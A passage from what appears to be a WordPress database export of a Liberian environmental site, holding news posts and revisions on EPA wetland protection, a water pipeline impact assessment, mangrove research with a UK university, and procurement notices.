celebration of World Wetlands Day at the Mesurado Wetland along the SKD Boulevard near the John Gbesay Resort in Paynesville, Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on the implementation of the new measures, Dr. Yarkpawolo said the EPA has already begun removing illegal structures from wetlands and enforcing compliance, but noted that the scale of violations remains a major challenge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the proposed US$3.2 million Wetlands Protection Program, once launched, will initially focus on the Mesurado and Marshall Wetlands and will combine enforcement, restoration, and community involvement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo said the program is expected to create jobs for young people as wetlands security officers, restore damaged wetland areas, prevent further encroachment through physical barriers, and establish protected mangrove parks for conservation, education, and eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his keynote address, Dr. Yarkpawolo described wetlands as among Liberia’s most valuable natural ecosystems and stressed that they should be protected as national assets. He noted that Liberia is endowed with rivers, swamps, floodplains, lagoons, and extensive mangrove systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further explained that mangroves play a key role in protecting coastal communities from flooding, erosion, and sea-level rise, while also storing large amounts of carbon that help reduce the effects of climate change. According to him, wetlands also support fisheries, agriculture, and livelihoods, making them vital to national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Wetlands are closely linked to Liberia’s cultural heritage,” Dr. Yarkpawolo stressed, noting that communities have depended on them for food, medicine, transportation, and spiritual practices for generations. He added that the destruction of wetlands also leads to the loss of culture, history, and identity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on the threats facing wetlands, Dr. Yarkpawolo said illegal sand mining, land reclamation, mangrove cutting, waste dumping, and poorly planned urban expansion continue to degrade wetlands across the country. He said these activities have resulted in frequent flooding, loss of fish breeding areas, declining livelihoods, and weakened climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year’s event was held under the theme “Protecting Wetlands, Conserving Cultural Heritage,” and brought together government officials, development partners, traditional leaders, youth groups, community members, and members of the media.<br>The celebration formed part of Liberia’s nationwide observance of World Wetlands Day following a proclamation by President Joseph Nyuma Boakai, Sr., declaring February 2, 2026, as World Wetlands Day to be observed as a working holiday.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>World Wetlands Day is observed annually to promote public understanding of the importance of wetlands and to advocate for their protection amid rising environmental threats. Liberia is a signatory to the Ramsar Convention on Wetlands of International Importance, an intergovernmental treaty adopted on February 2, 1971, in Ramsar, Iran, with global observance beginning in 1997.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks, Mr. Levi Z. Piah, National Focal Point of the Ramsar Convention at the EPA, said World Wetlands Day provides an opportunity to educate the public on the role wetlands play in national development. He noted that wetlands help reduce flooding, conserve biodiversity, support fisheries, and store carbon that strengthens Liberia’s response to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia’s commitment to the Ramsar Convention places a responsibility on all stakeholders to protect wetlands for the benefit of present and future generations,” Mr. Piah added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Montserrado County District #5 Representative, Hon. Prescilla Cooper, praised the EPA and its partners for ongoing efforts to preserve the country’s wetlands. She said protecting wetlands is critical to safeguarding communities, especially those living in flood-prone areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representative Cooper disclosed that plans are underway for her office to support government efforts by establishing offices near the Mesurado Wetlands for the Liberia Drug Enforcement Agency (LDEA) and the Liberia National Police, aimed at strengthening monitoring and enforcement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program also featured mangrove planting and the use of drones to document the Mesurado Wetlands, reflecting the EPA’s commitment to restoration, transparency, and science-based environmental management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the close of the program, the EPA and its partners reaffirmed their commitment to protecting Liberia’s wetlands, stressing that these ecosystems are not only environmental buffers but lifelines for communities, culture, and the national economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They emphasized that protecting wetlands today is essential to building a safer, more resilient, and sustainable Liberia for generations to come.</p>\n<!-- /wp:paragraph -->','EPA Announces New Measures to Protect Liberia’s Wetlands','','publish','open','open','','epa-announces-new-measures-to-protect-liberias-wetlands','','','2026-02-03 23:16:00','2026-02-03 23:16:00','',0,'https://ekmsliberia.info/?p=5769',28,'post','',0),(5770,38,'2026-02-03 23:15:58','2026-02-03 23:15:58','<!-- wp:paragraph -->\n<p>Paynesville, February 3, 2026_The Environmental Protection Agency of Liberia (EPA) has announced a series of new measures aimed at strengthening the protection of the country’s wetlands.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The measures include plans for a proposed US$3.2 million Wetlands Protection Program, the planned employment of youth as wetlands security officers, the removal of illegal structures, the installation of barriers to prevent encroachment, the restoration of degraded wetland areas, the creation of protected mangrove parks, and the use of drones for monitoring and documentation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The announcement was made on Monday, February 2, 2026, by EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, during the celebration of World Wetlands Day at the Mesurado Wetland along the SKD Boulevard near the John Gbesay Resort in Paynesville, Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on the implementation of the new measures, Dr. Yarkpawolo said the EPA has already begun removing illegal structures from wetlands and enforcing compliance, but noted that the scale of violations remains a major challenge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the proposed US$3.2 million Wetlands Protection Program, once launched, will initially focus on the Mesurado and Marshall Wetlands and will combine enforcement, restoration, and community involvement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo said the program is expected to create jobs for young people as wetlands security officers, restore damaged wetland areas, prevent further encroachment through physical barriers, and establish protected mangrove parks for conservation, education, and eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his keynote address, Dr. Yarkpawolo described wetlands as among Liberia’s most valuable natural ecosystems and stressed that they should be protected as national assets. He noted that Liberia is endowed with rivers, swamps, floodplains, lagoons, and extensive mangrove systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further explained that mangroves play a key role in protecting coastal communities from flooding, erosion, and sea-level rise, while also storing large amounts of carbon that help reduce the effects of climate change. According to him, wetlands also support fisheries, agriculture, and livelihoods, making them vital to national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Wetlands are closely linked to Liberia’s cultural heritage,” Dr. Yarkpawolo stressed, noting that communities have depended on them for food, medicine, transportation, and spiritual practices for generations. He added that the destruction of wetlands also leads to the loss of culture, history, and identity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on the threats facing wetlands, Dr. Yarkpawolo said illegal sand mining, land reclamation, mangrove cutting, waste dumping, and poorly planned urban expansion continue to degrade wetlands across the country. He said these activities have resulted in frequent flooding, loss of fish breeding areas, declining livelihoods, and weakened climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year’s event was held under the theme “Protecting Wetlands, Conserving Cultural Heritage,” and brought together government officials, development partners, traditional leaders, youth groups, community members, and members of the media.<br>The celebration formed part of Liberia’s nationwide observance of World Wetlands Day following a proclamation by President Joseph Nyuma Boakai, Sr., declaring February 2, 2026, as World Wetlands Day to be observed as a working holiday.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>World Wetlands Day is observed annually to promote public understanding of the importance of wetlands and to advocate for their protection amid rising environmental threats. Liberia is a signatory to the Ramsar Convention on Wetlands of International Importance, an intergovernmental treaty adopted on February 2, 1971, in Ramsar, Iran, with global observance beginning in 1997.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks, Mr. Levi Z. Piah, National Focal Point of the Ramsar Convention at the EPA, said World Wetlands Day provides an opportunity to educate the public on the role wetlands play in national development. He noted that wetlands help reduce flooding, conserve biodiversity, support fisheries, and store carbon that strengthens Liberia’s response to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia’s commitment to the Ramsar Convention places a responsibility on all stakeholders to protect wetlands for the benefit of present and future generations,” Mr. Piah added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Montserrado County District #5 Representative, Hon. Prescilla Cooper, praised the EPA and its partners for ongoing efforts to preserve the country’s wetlands. She said protecting wetlands is critical to safeguarding communities, especially those living in flood-prone areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representative Cooper disclosed that plans are underway for her office to support government efforts by establishing offices near the Mesurado Wetlands for the Liberia Drug Enforcement Agency (LDEA) and the Liberia National Police, aimed at strengthening monitoring and enforcement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program also featured mangrove planting and the use of drones to document the Mesurado Wetlands, reflecting the EPA’s commitment to restoration, transparency, and science-based environmental management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the close of the program, the EPA and its partners reaffirmed their commitment to protecting Liberia’s wetlands, stressing that these ecosystems are not only environmental buffers but lifelines for communities, culture, and the national economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They emphasized that protecting wetlands today is essential to building a safer, more resilient, and sustainable Liberia for generations to come.</p>\n<!-- /wp:paragraph -->','EPA Announces New Measures to Protect Liberia’s Wetlands','','inherit','closed','closed','','5769-revision-v1','','','2026-02-03 23:15:58','2026-02-03 23:15:58','',5769,'https://ekmsliberia.info/?p=5770',0,'revision','',0),(5771,38,'2026-02-05 22:44:16','2026-02-05 22:44:16','The Government of Liberia, through the Liberia Water and Sewer Corporation (LWSC), with financing support from the African Development Bank (AfDB) and the OPEC Fund for International Development, proposes to implement the Replacement of the Main Water Transmission Line Project (REMAWATL). The project involves the replacement of approximately 15.2 km of the existing 36-inch water transmission pipeline with a 48-inch ductile iron pipeline, extending from McCauley Hill, Johnsonville through Paynesville to Congo Town in Greater Monrovia.\r\n\r\nThe objective of the project is to improve the reliability, efficiency, and capacity of potable water supply to Monrovia and surrounding communities by addressing frequent leakages, pressure losses, and service interruptions associated with the aging transmission infrastructure. Additional project components include the installation of 10,000 smart prepaid water meters, upgrading of booster pump stations, and institutional strengthening and capacity building for LWSC.\r\n\r\nAn Environmental and Social Impact Assessment (ESIA) was conducted in compliance with the Environmental Protection and Management Law of Liberia, the EPA ESIA Procedural Guidelines, and the African Development Bank Integrated Safeguards System. The ESIA assessed baseline environmental and social conditions along the project corridor, evaluated project alternatives, identified potential risks and impacts, and developed appropriate mitigation and monitoring measures.\r\n\r\nAs part of the ESIA process, a site verification and field engagement exercise was conducted along the proposed project corridor. This exercise focused on verifying existing environmental and social conditions on the ground, identifying sensitive receptors, confirming land use patterns, and observing potential interaction points between project activities and surrounding communities, public infrastructure, and natural features. The field engagement supported the validation of baseline data and informed the identification of potential risks and mitigation measures.\r\n\r\nThe ESIA identified temporary and localized environmental and social impacts primarily during the construction phase, including dust and noise generation, traffic and pedestrian disruption, waste generation, occupational health and safety risks, and short-term disturbances to roadside economic activities. These impacts are considered manageable and reversible. A costed Environmental and Social Management Plan (ESMP) has been prepared to guide the effective mitigation, monitoring, and management of identified risks throughout the project lifecycle.\r\n\r\nThe ESIA concludes that the project is environmentally and socially acceptable, provided that the recommended mitigation measures, monitoring arrangements, and safeguard instruments are fully implemented. The project is expected to deliver significant long-term benefits, including improved access to safe drinking water, enhanced public health outcomes, reduced non-revenue water, job creation during construction, and strengthened institutional capacity within Liberia’s water sector.','ENVIRONMENTAL & SOCIAL IMPACT ASSESSMENT (ESIA) REPORT Replacement of the Main Water Transmission Line Project ” Transmission Pipeline from McCauley Hill, Johnsonville through','','publish','closed','closed','','environmental-social-impact-assessment-esia-report-replacement-of-the-main-water-transmission-line-project-transmission-pipeline-from-mccauley-hill-johnsonville-through','','','2026-02-05 22:44:16','2026-02-05 22:44:16','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5771',11,'document','',0),(5772,38,'2026-02-05 22:36:42','2026-02-05 22:36:42','','FINAL ESIA REMAWATL PROJECT_ Clean Copy_LWSC PIU_27.01.2026','','inherit','open','closed','','final-esia-remawatl-project_-clean-copy_lwsc-piu_27-01-2026','','','2026-02-05 22:36:42','2026-02-05 22:36:42','',5771,'https://ekmsliberia.info/wp-content/uploads/2026/02/FINAL-ESIA-REMAWATL-PROJECT_-Clean-Copy_LWSC-PIU_27.01.2026.pdf',0,'attachment','application/pdf',0),(5773,38,'2026-02-05 22:36:56','2026-02-05 22:36:56','','Screenshot 2026-02-05 at 22.31.46','','inherit','open','closed','','screenshot-2026-02-05-at-22-31-46','','','2026-02-05 22:36:56','2026-02-05 22:36:56','',5771,'https://ekmsliberia.info/wp-content/uploads/2026/02/Screenshot-2026-02-05-at-22.31.46.png',0,'attachment','image/png',0),(5777,38,'2026-02-05 22:44:16','2026-02-05 22:44:16','The Government of Liberia, through the Liberia Water and Sewer Corporation (LWSC), with financing support from the African Development Bank (AfDB) and the OPEC Fund for International Development, proposes to implement the Replacement of the Main Water Transmission Line Project (REMAWATL). The project involves the replacement of approximately 15.2 km of the existing 36-inch water transmission pipeline with a 48-inch ductile iron pipeline, extending from McCauley Hill, Johnsonville through Paynesville to Congo Town in Greater Monrovia.\r\n\r\nThe objective of the project is to improve the reliability, efficiency, and capacity of potable water supply to Monrovia and surrounding communities by addressing frequent leakages, pressure losses, and service interruptions associated with the aging transmission infrastructure. Additional project components include the installation of 10,000 smart prepaid water meters, upgrading of booster pump stations, and institutional strengthening and capacity building for LWSC.\r\n\r\nAn Environmental and Social Impact Assessment (ESIA) was conducted in compliance with the Environmental Protection and Management Law of Liberia, the EPA ESIA Procedural Guidelines, and the African Development Bank Integrated Safeguards System. The ESIA assessed baseline environmental and social conditions along the project corridor, evaluated project alternatives, identified potential risks and impacts, and developed appropriate mitigation and monitoring measures.\r\n\r\nAs part of the ESIA process, a site verification and field engagement exercise was conducted along the proposed project corridor. This exercise focused on verifying existing environmental and social conditions on the ground, identifying sensitive receptors, confirming land use patterns, and observing potential interaction points between project activities and surrounding communities, public infrastructure, and natural features. The field engagement supported the validation of baseline data and informed the identification of potential risks and mitigation measures.\r\n\r\nThe ESIA identified temporary and localized environmental and social impacts primarily during the construction phase, including dust and noise generation, traffic and pedestrian disruption, waste generation, occupational health and safety risks, and short-term disturbances to roadside economic activities. These impacts are considered manageable and reversible. A costed Environmental and Social Management Plan (ESMP) has been prepared to guide the effective mitigation, monitoring, and management of identified risks throughout the project lifecycle.\r\n\r\nThe ESIA concludes that the project is environmentally and socially acceptable, provided that the recommended mitigation measures, monitoring arrangements, and safeguard instruments are fully implemented. The project is expected to deliver significant long-term benefits, including improved access to safe drinking water, enhanced public health outcomes, reduced non-revenue water, job creation during construction, and strengthened institutional capacity within Liberia’s water sector.','ENVIRONMENTAL & SOCIAL IMPACT ASSESSMENT (ESIA) REPORT Replacement of the Main Water Transmission Line Project ” Transmission Pipeline from McCauley Hill, Johnsonville through','','inherit','closed','closed','','5771-revision-v1','','','2026-02-05 22:44:16','2026-02-05 22:44:16','',5771,'https://ekmsliberia.info/?p=5777',0,'revision','',0),(5778,38,'2026-02-10 13:36:03','2026-02-10 13:36:03','<!-- wp:paragraph -->\n<p>Manchester, United Kingdom — In a decisive step to strengthen climate resilience and environmental protection, the Environmental Protection Agency (EPA) of Liberia has begun a week-long technical exchange with Manchester Metropolitan University, turning a recent Memorandum of Understanding into on-the-ground scientific action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Running from February 9–15, the collaboration brings senior EPA scientists to Manchester for intensive laboratory analysis and research planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5779,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/02/todaynew.jpeg\" alt=\"\" class=\"wp-image-5779\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The delegation is led by Rafael Sarji Ngumbu, Director of Environmental Research and Radiation Safety, and Joseph F. Charles, Assistant Director of Environmental Monitoring and Research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the heart of the mission is a landmark blue carbon study using sediment samples gathered from eight of Liberia’s nine coastal counties. The work aims to quantify the carbon storage potential of Liberia’s vast mangrove ecosystems, build a national mangrove inventory in partnership with Conservation International, and advance flood-mapping models to better protect communities facing sea-level rise and extreme weather.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA team will also spotlight Liberia’s urgent research priorities: tackling marine pollution, improving plastic waste management, and assessing the environmental impacts of both artisanal and large-scale mining on the nation’s water resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A suite of advanced instruments, led by an Elemental Analyzer recently donated to the EPA by the International Atomic Energy Agency (IAEA), will underpin much of the laboratory work. By pairing this technology with Manchester Met’s academic expertise, the partnership is poised to elevate Liberia’s capacity to detect and manage Persistent Organic Pollutants (POPs) and so-called “forever chemicals” (PFAS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative is expected to deliver immediate and long-term benefits. EPA scientists will receive hands-on training with advanced analytical techniques; new, high-quality datasets will inform evidence-based policy and could unlock access to climate finance and carbon markets; and strengthened in-country lab capacity will enhance Liberia’s ability to independently monitor industrial waste and hazardous chemicals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Home to pristine rainforests and extensive coastal ecosystems, Liberia holds significant untapped research potential.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This collaboration marks the beginning of a sustained, data-driven partnership aimed at scientifically quantifying and safeguarding these globally important natural assets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With IAEA-backed technology and international academic support, Liberia’s environmental research future is not just on the horizon, it is taking shape now.</p>\n<!-- /wp:paragraph -->','Liberia Teams Up with UK University in High-Stakes Push to Map Mangroves, Fight Pollution','','publish','open','open','','liberia-teams-up-with-uk-university-in-high-stakes-push-to-map-mangroves-fight-pollution','','','2026-02-10 13:36:06','2026-02-10 13:36:06','',0,'https://ekmsliberia.info/?p=5778',27,'post','',0),(5779,38,'2026-02-10 13:35:18','2026-02-10 13:35:18','','todaynew','','inherit','open','closed','','todaynew','','','2026-02-10 13:35:18','2026-02-10 13:35:18','',5778,'https://ekmsliberia.info/wp-content/uploads/2026/02/todaynew.jpeg',0,'attachment','image/jpeg',0),(5780,38,'2026-02-10 13:35:52','2026-02-10 13:35:52','','today news','','inherit','open','closed','','today-news','','','2026-02-10 13:35:52','2026-02-10 13:35:52','',5778,'https://ekmsliberia.info/wp-content/uploads/2026/02/today-news.jpeg',0,'attachment','image/jpeg',0),(5781,38,'2026-02-10 13:36:03','2026-02-10 13:36:03','<!-- wp:paragraph -->\n<p>Manchester, United Kingdom — In a decisive step to strengthen climate resilience and environmental protection, the Environmental Protection Agency (EPA) of Liberia has begun a week-long technical exchange with Manchester Metropolitan University, turning a recent Memorandum of Understanding into on-the-ground scientific action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Running from February 9–15, the collaboration brings senior EPA scientists to Manchester for intensive laboratory analysis and research planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5779,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/02/todaynew.jpeg\" alt=\"\" class=\"wp-image-5779\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The delegation is led by Rafael Sarji Ngumbu, Director of Environmental Research and Radiation Safety, and Joseph F. Charles, Assistant Director of Environmental Monitoring and Research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the heart of the mission is a landmark blue carbon study using sediment samples gathered from eight of Liberia’s nine coastal counties. The work aims to quantify the carbon storage potential of Liberia’s vast mangrove ecosystems, build a national mangrove inventory in partnership with Conservation International, and advance flood-mapping models to better protect communities facing sea-level rise and extreme weather.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA team will also spotlight Liberia’s urgent research priorities: tackling marine pollution, improving plastic waste management, and assessing the environmental impacts of both artisanal and large-scale mining on the nation’s water resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A suite of advanced instruments, led by an Elemental Analyzer recently donated to the EPA by the International Atomic Energy Agency (IAEA), will underpin much of the laboratory work. By pairing this technology with Manchester Met’s academic expertise, the partnership is poised to elevate Liberia’s capacity to detect and manage Persistent Organic Pollutants (POPs) and so-called “forever chemicals” (PFAS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative is expected to deliver immediate and long-term benefits. EPA scientists will receive hands-on training with advanced analytical techniques; new, high-quality datasets will inform evidence-based policy and could unlock access to climate finance and carbon markets; and strengthened in-country lab capacity will enhance Liberia’s ability to independently monitor industrial waste and hazardous chemicals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Home to pristine rainforests and extensive coastal ecosystems, Liberia holds significant untapped research potential.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This collaboration marks the beginning of a sustained, data-driven partnership aimed at scientifically quantifying and safeguarding these globally important natural assets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With IAEA-backed technology and international academic support, Liberia’s environmental research future is not just on the horizon, it is taking shape now.</p>\n<!-- /wp:paragraph -->','Liberia Teams Up with UK University in High-Stakes Push to Map Mangroves, Fight Pollution','','inherit','closed','closed','','5778-revision-v1','','','2026-02-10 13:36:03','2026-02-10 13:36:03','',5778,'https://ekmsliberia.info/?p=5781',0,'revision','',0),(5793,38,'2026-02-23 09:59:44','2026-02-23 09:59:44','<h3>Background</h3>\r\n<strong> </strong>The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\n&nbsp;\r\n\r\nThe project will reduce exposure of Liberia’s communities, livelihoods, and infrastructure to climate-induced natural hazards through a well-functioning national Multi-Hazard Impact-Based Forecasting and Early Warning System (MHIBF-EWS). A well-functioning MH-IBF-EWS means having in place trained and equipped Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA), the National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings; scale-up evidence-based climate-informed decision-making, planning, and response actions countrywide. Having these in place will lead to transformative change in climate risk reduction and management in Liberia. This new paradigm will focus on translating meteorological and hydrological hazards into the sector- and location-specific potential impacts for the development of sectoral responses to mitigate those impacts <span style=\"font-family: \'TimesNewRomanPSMT\',serif;\">documents. </span>\r\n<h2 style=\"text-align: justify;\"><strong><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',serif; letter-spacing: -.1pt;\">Objective</span></strong></h2>\r\n<p style=\"text-align: justify; background: white;\"><span style=\"font-family: \'TimesNewRomanPSMT\',serif;\">The objective of the assignment is to improve the institutional capacity of the CIS Project through the development, upgrade and reform of systems vital for improved service delivery. The aim is to strengthen the CIS Project planning and coordination capacity by ensuring timely procurement of works, goods and services in accordance with the PPCC and Bank’s procurement rules and procedures.</span></p>\r\nClick to<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/02/Procurement-Officer-1.docx\" target=\"_blank\" rel=\"noopener\">aply</a>','Procurement Officer','','publish','closed','closed','','procurement-officer','','','2026-02-23 10:01:16','2026-02-23 10:01:16','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5793',14,'ekms_bulletin','',0),(5799,38,'2026-03-27 08:07:27','2026-03-27 08:07:27','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Economics-and-Markets-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Economic and Market Expert','','publish','closed','closed','','call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-economic-and-market-expert','','','2026-03-27 14:31:09','2026-03-27 14:31:09','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5799',13,'ekms_bulletin','',0),(5785,38,'2026-02-18 23:03:48','2026-02-18 23:03:48','<!-- wp:paragraph -->\n<p>Paynesville City, February 18, 2026-The Environmental Protection Agency of Liberia has validated Liberia’s first National Report on the Nagoya Protocol on Access and Benefit Sharing in a move described as a major step toward protecting the country’s biodiversity and ensuring communities benefit from its use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The validation exercise was held on Wednesday, February 18, 2026, at the Liberia Learning Center in Paynesville City, bringing together government officials, environmental experts, community leaders, consultants, and development partners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the opening statement, the Executive Director of the EPA, Dr. Emmanuel King Urey Yarkpawolo, said the process marks a turning point in how Liberia manages its natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the report goes beyond documentation and reflects a national effort to ensure fairness in the use of Liberia’s rich biological and genetic resources. According to him, Liberia’s forests, wetlands, rivers, mangroves, and coastal ecosystems continue to support livelihoods, food security, and traditional medicine while also holding scientific and economic value.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo noted that for many years, countries like Liberia and local communities have not received fair recognition or benefits when their resources and traditional knowledge were used. He said the Nagoya Protocol provides the legal framework to correct this imbalance by ensuring fair and equitable sharing of benefits.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Access and Benefit Sharing is not only an environmental issue but also touches on social, economic, cultural, and governance matters, adding that it strengthens national sovereignty while promoting responsible research and investment”, He emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director said the First National Report highlights progress made, including policy development, institutional coordination, stakeholder awareness, and initial steps toward establishing systems for prior informed consent and mutually agreed terms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, he acknowledged that challenges remain, including the need to finalize legal frameworks, strengthen community awareness, and build effective monitoring and compliance systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called on all stakeholders, including government institutions, academia, the private sector, and community leaders, to work together to ensure the success of Access and Benefit Sharing in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that the process must be inclusive and based on collaboration, noting that no single institution can achieve the goals of the Nagoya Protocol alone.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing further background, Frances B. Seydou, Director of Intersectoral Coordination at the EPA and National Focal Point for the Nagoya Protocol, explained that the protocol is an international agreement under the Convention on Biological Diversity, adopted in 2010 in Nagoya, Japan, and entered into force in 2014.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the agreement was developed in response to the growing global use of genetic resources and the need to ensure fairness and equity, especially for countries and communities that protect biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The protocol also recognizes national sovereignty over biological resources and seeks to protect traditional knowledge”, Mrs. Seydou added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, the main objective of the 